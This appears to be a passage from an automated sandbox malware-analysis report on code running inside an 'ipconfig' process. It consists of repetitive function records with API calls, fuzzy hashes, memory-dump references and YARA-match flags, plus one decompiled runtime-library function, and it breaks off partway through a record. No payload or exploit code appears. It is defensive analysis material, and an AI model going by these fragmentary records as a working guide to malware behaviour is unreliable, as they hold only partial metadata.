Snapshot File: hcaresult_8_2_2d20000_ipconfig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6748da85309839fc6aa78836b20e807aa725095ecd5f45c55a6757dd45dca1d3
Instruction ID: c24ed073b41be2e8206a50d62d9626849e8da38b388cfc039dd5da04fe45b01c
Opcode Fuzzy Hash: 6748da85309839fc6aa78836b20e807aa725095ecd5f45c55a6757dd45dca1d3
Instruction Fuzzy Hash: 5E90027121180046D70075694D14B07000697D4343F51C115B0144574CC9558CA1A571

Uniqueness

Uniqueness Score: -1.00%

Function 02D89840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D8984A

Memory Dump Source

Source File: 00000008.00000002.924248760.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000008.00000002.924418550.0000000002E3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.924431470.0000000002E3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d20000_ipconfig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a14c6665ca376c54be70fbec507548380d37204908c67eebe531c864343407b2
Instruction ID: fdab3419561007ab07cd23dd6d1f9ed55bc06fcb9d7e261f93592af42732d6d5
Opcode Fuzzy Hash: a14c6665ca376c54be70fbec507548380d37204908c67eebe531c864343407b2
Instruction Fuzzy Hash: 98900271242041565A45B15945045074007A7E4281791C012B1404970C85669C96E671

Uniqueness

Uniqueness Score: -1.00%

Function 02D89860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D8986A

Memory Dump Source

Source File: 00000008.00000002.924248760.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000008.00000002.924418550.0000000002E3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.924431470.0000000002E3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d20000_ipconfig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e5b0b7521c6893f515e6f44a4f988327a4b30268a9b4d82294673e801ff9b44a
Instruction ID: 04c2d164f849c9a2c039faf49e19c2f160c5b9412721350caf609b0805d153ec
Opcode Fuzzy Hash: e5b0b7521c6893f515e6f44a4f988327a4b30268a9b4d82294673e801ff9b44a
Instruction Fuzzy Hash: 6590027120100417D61171594604707000A97D4281F91C412B0414578D96968D92F171

Uniqueness

Uniqueness Score: -1.00%

Function 02D899A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D899AA

Memory Dump Source

Source File: 00000008.00000002.924248760.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000008.00000002.924418550.0000000002E3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.924431470.0000000002E3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d20000_ipconfig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b3f57f520c24e4f9fa2ff2e16f41d1bb27413ab73659d4e771894ddbc8b664f2
Instruction ID: 70efe9322a0e555bc74fe9970a6d6d2ac6ef1a68e8854e4c99e5f454eae890ab
Opcode Fuzzy Hash: b3f57f520c24e4f9fa2ff2e16f41d1bb27413ab73659d4e771894ddbc8b664f2
Instruction Fuzzy Hash: 609002B134100446D60071594514B070006D7E5341F51C015F1054574D8659CC92B176

Uniqueness

Uniqueness Score: -1.00%

Function 02D89910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D8991A

Memory Dump Source

Source File: 00000008.00000002.924248760.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000008.00000002.924418550.0000000002E3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.924431470.0000000002E3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d20000_ipconfig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a54b085232909e91d546850e766486ad491b5aa189c0bc5a7d999a24f0a7c51e
Instruction ID: 88eac167a85e80f6d5461198e440fadc91e7f7a678a6eb1394574bdf79a4274e
Opcode Fuzzy Hash: a54b085232909e91d546850e766486ad491b5aa189c0bc5a7d999a24f0a7c51e
Instruction Fuzzy Hash: 5B9002B120100406D64071594504747000697D4341F51C011B5054574E86998DD5B6B5

Uniqueness

Uniqueness Score: -1.00%

Function 02D896D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D896DA

Memory Dump Source

Source File: 00000008.00000002.924248760.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000008.00000002.924418550.0000000002E3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.924431470.0000000002E3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d20000_ipconfig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a8e6752e45476bb98f9f70c7d2c09372981ae2fdb66005fecfaba798bf2471e6
Instruction ID: f47be414593438bc8030276eda64b02cf794416c05c428652b3b767b19db505c
Opcode Fuzzy Hash: a8e6752e45476bb98f9f70c7d2c09372981ae2fdb66005fecfaba798bf2471e6
Instruction Fuzzy Hash: B090027120100846D60071594504B47000697E4341F51C016B0114674D8655CC91B571

Uniqueness

Uniqueness Score: -1.00%

Function 02D896E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D896EA

Memory Dump Source

Source File: 00000008.00000002.924248760.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000008.00000002.924418550.0000000002E3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.924431470.0000000002E3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d20000_ipconfig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cbd6e4a5778540c79666b52c7de7822c19483422306119c326cb8837ff317d67
Instruction ID: d307cfc31ee9eda51a2f64dae9331612e0f7b0c8540919f0fef11f18db377316
Opcode Fuzzy Hash: cbd6e4a5778540c79666b52c7de7822c19483422306119c326cb8837ff317d67
Instruction Fuzzy Hash: C190027120108806D6107159850474B000697D4341F55C411B4414678D86D58CD1B171

Uniqueness

Uniqueness Score: -1.00%

Function 02D89FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D89FEA

Memory Dump Source

Source File: 00000008.00000002.924248760.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000008.00000002.924418550.0000000002E3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.924431470.0000000002E3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d20000_ipconfig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 480a870ff2165a296371c8292231ae5b196f2c50bd5a7e9021af88adb13fd165
Instruction ID: b1e9e03ba6795b4d436a1e0ecf4606053cfaa12626222c9b013794f068545441
Opcode Fuzzy Hash: 480a870ff2165a296371c8292231ae5b196f2c50bd5a7e9021af88adb13fd165
Instruction Fuzzy Hash: E890027131114406D61071598504707000697D5241F51C411B0814578D86D58CD1B172

Uniqueness

Uniqueness Score: -1.00%

Function 02D89780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D8978A

Memory Dump Source

Source File: 00000008.00000002.924248760.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000008.00000002.924418550.0000000002E3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.924431470.0000000002E3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d20000_ipconfig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 96f525b78561b8196390f9bf86545892f2867eff4457e3d4298ed59a40619cba
Instruction ID: 0bcddb99649c39d91f8f9e19be8c208e179a48c70063f83fd29a270feef143b8
Opcode Fuzzy Hash: 96f525b78561b8196390f9bf86545892f2867eff4457e3d4298ed59a40619cba
Instruction Fuzzy Hash: 8090027921300006D6807159550860B000697D5242F91D415B0005578CC9558CA9A371

Uniqueness

Uniqueness Score: -1.00%

Function 02D89710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D8971A

Memory Dump Source

Source File: 00000008.00000002.924248760.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000008.00000002.924418550.0000000002E3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.924431470.0000000002E3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d20000_ipconfig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a8a4034bc20a05923678877845a3bf3cce6abd5f59835ddd12657ac16c4721fe
Instruction ID: b421e86dc169934b2d3748b10835b67c82b65724309654256bf224e347154ae1
Opcode Fuzzy Hash: a8a4034bc20a05923678877845a3bf3cce6abd5f59835ddd12657ac16c4721fe
Instruction Fuzzy Hash: C690027120100406D60075995508647000697E4341F51D011B5014575EC6A58CD1B171

Uniqueness

Uniqueness Score: -1.00%

Function 02D895D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D895DA

Memory Dump Source

Source File: 00000008.00000002.924248760.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000008.00000002.924418550.0000000002E3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.924431470.0000000002E3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d20000_ipconfig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a34d237501d9e6eb15f179212a829eefccdc60bf9004e0cb764b09a57fe5b91d
Instruction ID: d66096279c1c743650d7e534d218f69748bb0c00b6b0b0fa9fc1070bd00e2eef
Opcode Fuzzy Hash: a34d237501d9e6eb15f179212a829eefccdc60bf9004e0cb764b09a57fe5b91d
Instruction Fuzzy Hash: D39002B120200007460571594514617400B97E4241B51C021F10045B0DC5658CD1B175

Uniqueness

Uniqueness Score: -1.00%

Function 02D89540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D8954A

Memory Dump Source

Source File: 00000008.00000002.924248760.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000008.00000002.924418550.0000000002E3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.924431470.0000000002E3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d20000_ipconfig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8e7f248f72b18338d0e5bca999fd1fba73bf7a3b5b1e83db5d47e78f9786baab
Instruction ID: f32bb3c350429112f690cc6555f54ab2c79c8def63ef71055e77ae3dacfe8076
Opcode Fuzzy Hash: 8e7f248f72b18338d0e5bca999fd1fba73bf7a3b5b1e83db5d47e78f9786baab
Instruction Fuzzy Hash: E2900275211000070605B5590704507004797D9391351C021F1005570CD6618CA1A171

Uniqueness

Uniqueness Score: -1.00%

Function 02657310 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 026573B8

Strings

wininet.dll, xrefs: 0265736E, 02657377
net.dll, xrefs: 02657381, 02657407, 026573DF, 026573EB, 02657413

Memory Dump Source

Source File: 00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2640000_ipconfig.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 59d29bbcde34b40a777fb49e356fb5f247a4b950b20576e6ffbb58854dfeb42e
Instruction ID: 9096c713034bfd22146acc7a991c2319e478080841cc93ccbb9d8a7bda753df6
Opcode Fuzzy Hash: 59d29bbcde34b40a777fb49e356fb5f247a4b950b20576e6ffbb58854dfeb42e
Instruction Fuzzy Hash: E23190B6502600ABD711DF64C8A0FABB7B9FF88704F00811DFA599B240D770B555CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 026588F3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02643B93), ref: 0265892D

Strings

.z`, xrefs: 0265891C, 02658928

Memory Dump Source

Source File: 00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2640000_ipconfig.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: fa672acfec8cfe5ed469eee5026c2b255a6d8902d254ff4152af4d9f4765b728
Instruction ID: 52672ddba2933a5816f90a929300b31c8028a70d8a4037d45df9607eae446e3a
Opcode Fuzzy Hash: fa672acfec8cfe5ed469eee5026c2b255a6d8902d254ff4152af4d9f4765b728
Instruction Fuzzy Hash: AAE065B1610218ABC728DF9ADC89EA737A9EF88360F008149FD095B291C631E810CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02658900 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02643B93), ref: 0265892D

Strings

.z`, xrefs: 0265891C, 02658928

Memory Dump Source

Source File: 00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2640000_ipconfig.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 25a3d16e71a1834a976855884e559e7acf8fd6c5db1bcaa7609f81908f4ab26c
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 23E04FB1200218ABD714DF59CC48EA777ADEF88750F014558FD0857241C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 02647290 Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 026472EA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0264730B

Memory Dump Source

Source File: 00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2640000_ipconfig.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: a18ddeda0bb52dac821013b9bd9252989e64dc01161c556106a0c3a29986c39b
Instruction ID: f502260a9de74b749b5e2a63f0d934eec088f21e3ca2ee23a4587e5cdb3d64e3
Opcode Fuzzy Hash: a18ddeda0bb52dac821013b9bd9252989e64dc01161c556106a0c3a29986c39b
Instruction Fuzzy Hash: FA01A731A8022876E722AA949C42FBF776C5B01F55F040119FF44BA2C0EB9469064BF9

Uniqueness

Uniqueness Score: -1.00%

Function 02649B50 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02649BC2

Memory Dump Source

Source File: 00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2640000_ipconfig.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction ID: a08cbf5264ac11693aa5fb38eafde30cff5a5647e6bd2f81353c179eafea69a9
Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction Fuzzy Hash: DE011EB5D4020DABDF10EAE4DC41F9EB7B99B54308F104199ED08A7240FA71EB14CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0265896D Relevance: 1.5, APIs: 1, Instructions: 43
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 026589C4

Memory Dump Source

Source File: 00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2640000_ipconfig.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 9ac08c811a1099899f9763f830b4e52d3a4078abe0cad07f9daca551bab88b43
Instruction ID: 09b8a01165975bef033bd65b3fa70fdb96f3bacc697926d1bc98bfa5da5670a9
Opcode Fuzzy Hash: 9ac08c811a1099899f9763f830b4e52d3a4078abe0cad07f9daca551bab88b43
Instruction Fuzzy Hash: CB019DB2201108ABCB54DF99DC94EEB77ADAF8C354F158248FE1DA7291C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02658970 Relevance: 1.5, APIs: 1, Instructions: 42
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 026589C4

Memory Dump Source

Source File: 00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2640000_ipconfig.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: d42339b2d2f459c4e5eaea96e9fe40a48c94c1c29d919aef79f99ab8bcd9249f
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 3101AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02657440 Relevance: 1.5, APIs: 1, Instructions: 36
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0264CD00,?,?), ref: 0265747C

Memory Dump Source

Source File: 00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2640000_ipconfig.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 7b3b403665da2c860ef292ee6a93973a7b0780c8a9fe3047952ff3ac637d24d8
Instruction ID: 3d120d55699d5f709208c733b16c441abb5044982ed4f2254622484c5442c661
Opcode Fuzzy Hash: 7b3b403665da2c860ef292ee6a93973a7b0780c8a9fe3047952ff3ac637d24d8
Instruction Fuzzy Hash: 49E06D333802243AE2216599AC02FA7B29CCB81B60F14002AFA0DEA2C0D595F80146E8

Uniqueness

Uniqueness Score: -1.00%

Function 02657433 Relevance: 1.5, APIs: 1, Instructions: 36
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0264CD00,?,?), ref: 0265747C

Memory Dump Source

Source File: 00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2640000_ipconfig.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 4a494fdcce838c1a5a66220bec3ce1a287839b8168726362d64fd17308c6038c
Instruction ID: 0b4e694139da34cdd3f9c073e45492899c99f7a48bcc40bffbd330f4e7dbcf48
Opcode Fuzzy Hash: 4a494fdcce838c1a5a66220bec3ce1a287839b8168726362d64fd17308c6038c
Instruction Fuzzy Hash: 3DF0E5333807103EE7312598DC03FA772D8DB90B20F20052AFB48AB2C0D9A1F80146E9

Uniqueness

Uniqueness Score: -1.00%

Function 02658A51 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0264CFD2,0264CFD2,?,00000000,?,?), ref: 02658A90

Memory Dump Source

Source File: 00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2640000_ipconfig.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 97974770110b005db34b430894dabcf5d405bc605c48f48cb8cf8fafd12575e2
Instruction ID: 6d677bba1fb08642fa9e711c40ce40dd4777659425cf2b8994b077c1e0949122
Opcode Fuzzy Hash: 97974770110b005db34b430894dabcf5d405bc605c48f48cb8cf8fafd12575e2
Instruction Fuzzy Hash: 69E039B5600258BBDB20DF59DC85EE73BADAF89750F008954FA486B241D970F811CBF5

Uniqueness

Uniqueness Score: -1.00%

Function 02658A60 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0264CFD2,0264CFD2,?,00000000,?,?), ref: 02658A90

Memory Dump Source

Source File: 00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2640000_ipconfig.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: a4344a77961dc8bd515dae59384a07e8275fd2c674982df1690a9220c8a2dd0a
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: E0E01AB1200218ABDB20DF59CC84EE737ADAF88750F018154BE0857241CA30E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0264D440 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02647C93,?), ref: 0264D46B

Memory Dump Source

Source File: 00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp, Offset: 02640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2640000_ipconfig.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction ID: ff7c6ad4a5de6cd218933a2f1204bc5f9e72f73b34611209118ea4116d43f0ef
Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction Fuzzy Hash: EDD0A7717503083BE710FAA89C03F2632CD5B44B44F494064FA49D73C3DE54F4004565

Uniqueness

Uniqueness Score: -1.00%

Function 02D8967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02D89694

Memory Dump Source

Source File: 00000008.00000002.924248760.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000008.00000002.924418550.0000000002E3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.924431470.0000000002E3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d20000_ipconfig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3e72b9b0507866a0a8a9254bcc01a6a88de6d8256206013652c6bc0c47686314
Instruction ID: 5a569479e58eabbfaa0bf04e262662896d67b1ea9ce420c4986dbeb03de92202
Opcode Fuzzy Hash: 3e72b9b0507866a0a8a9254bcc01a6a88de6d8256206013652c6bc0c47686314
Instruction Fuzzy Hash: 2FB092B29024C5CAEB11F7A14B08B3B7A01BBD4741F26C062E24206B1A4778C8D1F6B6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02DDFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E02DDFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E02D8CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E02DD5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E02DD5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x02ddfdda
0x02ddfde2
0x02ddfde5
0x02ddfdec
0x02ddfdfa
0x02ddfdff
0x02ddfe0a
0x02ddfe0f
0x02ddfe17
0x02ddfe1e
0x02ddfe19
0x02ddfe19
0x02ddfe19
0x02ddfe20
0x02ddfe21
0x02ddfe22
0x02ddfe25
0x02ddfe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02DDFDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02DDFE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02DDFE2B

Memory Dump Source

Source File: 00000008.00000002.924248760.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000008.00000002.924418550.0000000002E3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.924431470.0000000002E3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d20000_ipconfig.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: cb7e3cccaedbdeb1bb52ccfc6add512762696aec928d9f649aba4086b3f8605c
Instruction ID: c44cbf23067bccb81202deb4ff0ba45292cdb755d59bac9206ea9bc5bd22202a
